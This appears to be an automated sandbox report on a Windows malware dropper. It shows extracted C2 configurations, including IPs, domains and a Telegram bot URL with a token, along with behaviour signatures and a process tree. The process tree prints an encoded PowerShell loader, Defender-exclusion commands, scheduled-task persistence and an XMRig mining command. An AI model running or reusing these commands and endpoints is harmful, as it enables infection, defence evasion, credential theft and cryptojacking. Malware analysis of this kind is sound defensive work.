Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
-
submitted
18-05-2024 13:51
General
-
Target
01d1e3c0b403afcb5c81b637a70b3d68d1781edf17362bd2af6ef16507888e9e.exe
-
Size
1.8MB
-
MD5
34d867556165de74dcaf1e92b633f86e
-
SHA1
e3191f8d3c854df1a41718f9ebe0b0fe35d1419d
-
SHA256
01d1e3c0b403afcb5c81b637a70b3d68d1781edf17362bd2af6ef16507888e9e
-
SHA512
f234c617e2ffcb913c764a61b3725057771256731840d43ed0028fd6d80112d42b2dacb98daeb4a05d79359b5054d553c35df15b6cfe081310c9294d872d6267
-
SSDEEP
24576:0Znk/imFiYBD0eXssdeccN0NvDNbNMiGiaChb85OTs5+j4jD3Xmnnq7pb4EeZfQq:qk/imFlLhoOHJwiAasIsfHm6rPU+yqk
Malware Config
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:26260
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
redline
Vic
beshomandotestbesnd.run.place:1111
Extracted
stealc
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect Vidar Stealer 1 IoCs
-
Detect Xworm Payload 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs 2 IoCs
-
XMRig Miner payload 4 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 17 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 41 IoCs
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 5 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Program Files directory 15 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 56 IoCs
-
Suspicious use of AdjustPrivilegeToken 22 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\01d1e3c0b403afcb5c81b637a70b3d68d1781edf17362bd2af6ef16507888e9e.exe"C:\Users\Admin\AppData\Local\Temp\01d1e3c0b403afcb5c81b637a70b3d68d1781edf17362bd2af6ef16507888e9e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "4⤵
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "4⤵
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\system.exe"C:\ProgramData\system.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"5⤵
- Creates scheduled task(s)
-
C:\ProgramData\build.exe"C:\ProgramData\build.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 15484⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000060001\csrss.exe"C:\Users\Admin\AppData\Local\Temp\1000060001\csrss.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\550989.exe"C:\Windows\Temp\550989.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\Temp\778775.exe"C:\Windows\Temp\778775.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2724 -ip 27241⤵
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Scheduled Task/Job
1Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GameSyncLink\GameService.exeFilesize
288KB
MD5d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA5121b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exeFilesize
2.5MB
MD5e6943a08bb91fc3086394c7314be367d
SHA1451d2e171f906fa6c43f8b901cd41b0283d1fa40
SHA256aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873
SHA512505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exeFilesize
6.2MB
MD51bacbebf6b237c75dbe5610d2d9e1812
SHA13ca5768a9cf04a2c8e157d91d4a1b118668f5cf1
SHA256c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d
SHA512f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exeFilesize
13.2MB
MD572b396a9053dff4d804e07ee1597d5e3
SHA15ec4fefa66771613433c17c11545c6161e1552d5
SHA256d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d
SHA512ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b
-
C:\Program Files (x86)\GameSyncLink\installc.batFilesize
301B
MD5998ab24316795f67c26aca0f1b38c8ce
SHA1a2a6dc94e08c086fe27f8c08cb8178e7a64f200d
SHA256a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e
SHA5127c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75
-
C:\Program Files (x86)\GameSyncLink\installg.batFilesize
284B
MD55dee3cbf941c5dbe36b54690b2a3c240
SHA182b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1
SHA25698370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb
